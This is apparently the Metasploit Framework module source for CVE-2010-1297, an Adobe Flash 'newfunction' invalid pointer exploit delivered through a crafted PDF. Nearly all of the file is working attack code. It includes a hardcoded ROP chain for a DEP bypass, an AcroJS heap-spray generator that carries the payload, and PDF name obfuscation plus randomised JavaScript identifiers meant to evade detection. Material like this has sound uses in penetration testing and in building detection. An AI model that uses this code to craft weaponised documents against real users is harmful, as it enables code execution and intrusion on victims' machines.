GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'zlib'
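class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  # Registers the module metadata (name, references, payload constraints,
  # targets) and the FILENAME option consumed by file_create.
  #
  # @param info [Hash] metadata merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Adobe Flash Player "newfunction" Invalid Pointer Use',
      'Description' => %q{
        This module exploits a vulnerability in the DoABC tag handling within
        versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also
        vulnerable, as are any other applications that may embed Flash player.

        Arbitrary code execution is achieved by embedding a specially crafted Flash
        movie into a PDF document. An AcroJS heap spray is used in order to ensure
        that the memory used by the invalid pointer issue is controlled.

        NOTE: This module uses a similar DEP bypass method to that used within the
        adobe_libtiff module. This method is unlikely to work across various
        Windows versions due a the hardcoded syscall number.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'Unknown', # Found being openly exploited
        'jduck'    # Metasploit version
      ],
      'References' => [
        ['CVE', '2010-1297'],
        ['OSVDB', '65141'],
        ['BID', '40586'],
        ['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'],
        # For SWF->PDF embedding
        ['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']
      ],
      'DefaultOptions' => {
        'EXITFUNC' => 'process',
        'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        'DisablePayloadHandler' => true
      },
      'Payload' => {
        'Space' => 1000,
        'BadChars' => "\x00",
        'DisableNops' => true
      },
      'Platform' => 'win',
      'Targets' => [
        # Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd
        # Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd
        # Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd
        [ 'Automatic', { }],
      ],
      'DisclosureDate' => '2010-06-04',
      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
      ])
  end

  # Entry point: assembles the SWF trigger and the JavaScript stream into a
  # PDF and writes it out under the FILENAME option via file_create.
  def exploit
    swf_data = make_swf
    js_data = make_js(payload.encoded)

    # Create the pdf
    pdf = make_pdf(swf_data, js_data)

    print_status("Creating '#{datastore['FILENAME']}' file...")

    file_create(pdf)
  end

  # Loads the static SWF trigger shipped in the framework data directory.
  #
  # @return [String] the raw (binary) SWF bytes; make_pdf embeds them as-is
  # @raise [Errno::ENOENT] if the data file is missing
  def make_swf
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2010-1297.swf")
    # File.binread reads the whole file in binary mode and always closes the
    # handle, even when the read raises; the previous open/read/close sequence
    # leaked the descriptor on error.
    File.binread(path)
  end

  # Builds the AcroJS heap-spray block that carries the ROP stack and payload.
  #
  # @param encoded_payload [String] the encoded payload bytes
  # @return [String] JavaScript source with randomized identifier names
  def make_js(encoded_payload)

    # The following executes a ret2lib using BIB.dll
    # The effect is to bypass DEP and execute the shellcode in an indirect way
    stack_data = [
      0xc0c0c0c,
      0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret
      0xcccccccc,
      0x70048ef, # xchg eax,esp / ret
      0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]
      0xcccccccc,
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009033, # ret 0x18
      0x7009084, # ret
      0xc0c0c0c,
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7009084, # ret
      0x7001599, # pop ebp / ret
      0x10124,
      0x70072f7, # pop eax / ret
      0x10104,
      0x70015bb, # pop ecx / ret
      0x1000,
      0x700154d, # mov [eax], ecx / ret
      0x70015bb, # pop ecx / ret
      0x7ffe0300, # -- location of KiFastSystemCall
      0x7007fb2, # mov eax, [ecx] / ret
      0x70015bb, # pop ecx / ret
      0x10011,
      0x700a8ac, # mov [ecx], eax / xor eax,eax / ret
      0x70015bb, # pop ecx / ret
      0x10100,
      0x700a8ac, # mov [ecx], eax / xor eax,eax / ret
      0x70072f7, # pop eax / ret
      0x10011,
      0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)
      0x7005c54, # pop esi / add esp,0x14 / ret
      0xffffffff,
      0x10100,
      0x0,
      0x10104,
      0x1000,
      0x40,
      # The next bit effectively copies data from the interleaved stack to the memory
      # pointed to by eax
      # The data copied is:
      # \x5a\x90\x54\x90\x5a\xeb\x15\x58\x8b\x1a\x89\x18\x83\xc0\x04\x83
      # \xc2\x04\x81\xfb\x0c\x0c\x0c\x0c\x75\xee\xeb\x05\xe8\xe6\xff\xff
      # \xff\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xff\xff\xff\x90
      0x700d731, # mov eax, [ebp-0x24] / ret
      0x70015bb, # pop ecx / ret
      0x9054905a,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x5815eb5a,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x18891a8b,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x8304c083,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0xfb8104c2,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0xc0c0c0c,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x5ebee75,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0xffffe6e8,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x909090ff,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x90909090,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x90909090,
      0x700154d, # mov [eax], ecx / ret
      0x700a722, # add eax, 4 / ret
      0x70015bb, # pop ecx / ret
      0x90ffffff,
      0x700154d, # mov [eax], ecx / ret
      0x700d731, # mov eax, [ebp-0x24] / ret
      0x700112f # call eax -- (execute stub to transition to full shellcode)
    ].pack('V*')

    # Every JavaScript identifier is randomized per run so the generated
    # script has no fixed variable names.
    var_unescape = rand_text_alpha(rand(100) + 1)
    var_shellcode = rand_text_alpha(rand(100) + 1)

    var_start = rand_text_alpha(rand(100) + 1)

    var_s = 0x10000
    var_c = rand_text_alpha(rand(100) + 1)
    var_b = rand_text_alpha(rand(100) + 1)
    var_d = rand_text_alpha(rand(100) + 1)
    var_3 = rand_text_alpha(rand(100) + 1)
    var_i = rand_text_alpha(rand(100) + 1)
    var_4 = rand_text_alpha(rand(100) + 1)

    payload_buf = ''
    payload_buf << stack_data
    payload_buf << encoded_payload

    escaped_payload = Rex::Text.to_unescape(payload_buf)

    js = %Q|
      var #{var_unescape} = unescape;
      var #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );
      var #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
      while (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};
      #{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);
      #{var_b} += #{var_shellcode};
      #{var_b} += #{var_c};
      #{var_d} = #{var_b}.substring(0, #{var_s}/2);
      while(#{var_d}.length < 0x80000) #{var_d} += #{var_d};
      #{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);
      var #{var_4} = new Array();
      for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s";
    |

    js
  end

  # Returns +count+ random bytes in the 0x80..0xff range.
  # Currently unused: its only call site in make_pdf is commented out.
  #
  # @param count [Integer] number of bytes to produce
  # @return [String]
  def random_non_ascii_string(count)
    result = ""
    count.times do
      result << (rand(128) + 128).chr
    end
    result
  end

  # PDF indirect object header for object +id+ (generation 0).
  #
  # @param id [Integer]
  # @return [String] e.g. "5 0 obj\n"
  def io_def(id)
    "%d 0 obj\n" % id
  end

  # PDF indirect reference to object +id+ (generation 0).
  #
  # @param id [Integer]
  # @return [String] e.g. "5 0 R"
  def io_ref(id)
    "%d 0 R" % id
  end

  # Randomly hex-escapes letters in a PDF name/dictionary string ("#41" for "A").
  # This is a PDF-level obfuscation (see the reference below); analysis tooling
  # must normalize #xx escapes before matching on names such as /OpenAction.
  #
  # http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
  #
  # @param str [String] ASCII PDF syntax
  # @return [String] the same syntax with a random subset of letters escaped
  def n_obfu(str)
    result = ""
    str.scan(/./u) do |c|
      # Only letters are candidates, and each is escaped with 50% probability.
      if rand(2).zero? && c.upcase >= 'A' && c.upcase <= 'Z'
        result << "#%x" % c.unpack("C*")[0]
      else
        result << c
      end
    end
    result
  end

  # ASCIIHex-encodes +str+ with 1-3 random spaces between byte pairs and the
  # ">" end-of-data marker, suitable for an /ASCIIHexDecode filter.
  #
  # @param str [String]
  # @return [String]
  def ascii_hex_whitespace_encode(str)
    result = ""
    whitespace = ""
    str.each_byte do |b|
      result << whitespace << "%02x" % b
      whitespace = " " * (rand(3) + 1)
    end
    result << ">"
  end

  # Assembles the PDF: a catalog whose /OpenAction runs the JavaScript stream
  # (object 6, Flate + ASCIIHex encoded) and a page carrying a RichMedia
  # annotation that embeds the SWF (object 16).
  #
  # Object numbers are fixed (1, 3..16); the xref table is built from the byte
  # offsets recorded in +xref+ as each object is appended. From a detection
  # standpoint the combination of a RichMedia/Flash annotation, an /OpenAction
  # JavaScript action, hex-escaped names and a Flate+ASCIIHex filter chain is
  # what this generator leaves behind.
  #
  # @param swf [String] raw SWF bytes (already compressed, embedded verbatim)
  # @param js [String] JavaScript source to place in the /OpenAction stream
  # @return [String] the complete PDF document
  def make_pdf(swf, js)

    swf_name = rand_text_alpha(8 + rand(8)) + ".swf"

    xref = []
    eol = "\n"
    endobj = "endobj" << eol

    # Randomize PDF version?
    pdf = "%PDF-1.5" << eol
    #pdf << "%" << random_non_ascii_string(4) << eol

    # catalog
    xref << pdf.length
    pdf << io_def(1) << n_obfu("<</Type/Catalog")
    pdf << n_obfu("/Pages ") << io_ref(3)
    pdf << n_obfu("/OpenAction ") << io_ref(5)
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # pages array
    xref << pdf.length
    pdf << io_def(3) << n_obfu("<</Type/Pages/Count 1/Kids [") << io_ref(4) << n_obfu("]>>") << eol << endobj

    # page 1
    xref << pdf.length
    pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3)
    pdf << n_obfu("/Annots [") << io_ref(7) << n_obfu("] ")
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # js action
    xref << pdf.length
    pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") << io_ref(6) << ">>" << eol << endobj

    # js stream
    xref << pdf.length
    compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
    pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
    pdf << "stream" << eol
    pdf << compressed << eol
    pdf << "endstream" << eol
    pdf << endobj

    # swf annotation object
    xref << pdf.length
    pdf << io_def(7) << n_obfu("<</Type/Annot/Subtype/RichMedia")
    pdf << n_obfu("/Rect [20 20 187 69] ")
    pdf << n_obfu("/RichMediaSettings ") << io_ref(8)
    pdf << n_obfu("/RichMediaContent ") << io_ref(9)
    pdf << n_obfu("/NM (") << swf_name << n_obfu(")")
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # rich media settings
    xref << pdf.length
    pdf << io_def(8)
    pdf << n_obfu("<</Type/RichMediaSettings/Subtype/Flash")
    pdf << n_obfu("/Activation ") << io_ref(10)
    pdf << n_obfu("/Deactivation ") << io_ref(11)
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # rich media content
    xref << pdf.length
    pdf << io_def(9)
    pdf << n_obfu("<</Type/RichMediaContent")
    pdf << n_obfu("/Assets ") << io_ref(12)
    pdf << n_obfu("/Configurations [") << io_ref(14) << "]"
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # rich media activation / deactivation
    xref << pdf.length
    pdf << io_def(10)
    pdf << n_obfu("<</Type/RichMediaActivation/Condition/PO>>")
    pdf << eol << endobj

    xref << pdf.length
    pdf << io_def(11)
    pdf << n_obfu("<</Type/RichMediaDeactivation/Condition/XD>>")
    pdf << eol << endobj

    # rich media assets
    xref << pdf.length
    pdf << io_def(12)
    pdf << n_obfu("<</Names [(#{swf_name}) ") << io_ref(13) << n_obfu("]>>")
    pdf << eol << endobj

    # swf embedded file ref
    xref << pdf.length
    pdf << io_def(13)
    pdf << n_obfu("<</Type/Filespec /EF <</F ") << io_ref(16) << n_obfu(">> /F(#{swf_name})>>")
    pdf << eol << endobj

    # rich media configuration
    xref << pdf.length
    pdf << io_def(14)
    pdf << n_obfu("<</Type/RichMediaConfiguration/Subtype/Flash")
    pdf << n_obfu("/Instances [") << io_ref(15) << n_obfu("]>>")
    pdf << eol << endobj

    # rich media instance
    xref << pdf.length
    pdf << io_def(15)
    pdf << n_obfu("<</Type/RichMediaInstance/Subtype/Flash")
    pdf << n_obfu("/Asset ") << io_ref(13)
    pdf << n_obfu(">>")
    pdf << eol << endobj

    # swf stream
    # NOTE: This data is already compressed, no need to compress it again...
    xref << pdf.length
    pdf << io_def(16) << n_obfu("<</Type/EmbeddedFile/Length %s>>" % swf.length) << eol
    pdf << "stream" << eol
    pdf << swf << eol
    pdf << "endstream" << eol
    pdf << endobj

    # trailing stuff: xref table, trailer and startxref pointer
    xref_position = pdf.length
    pdf << "xref" << eol
    pdf << "0 %d" % (xref.length + 1) << eol
    pdf << "0000000000 65535 f" << eol
    xref.each do |index|
      pdf << "%010d 00000 n" % index << eol
    end

    pdf << "trailer" << eol
    pdf << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol

    pdf << "startxref" << eol
    pdf << xref_position.to_s << eol

    pdf << "%%EOF" << eol
    pdf
  end
end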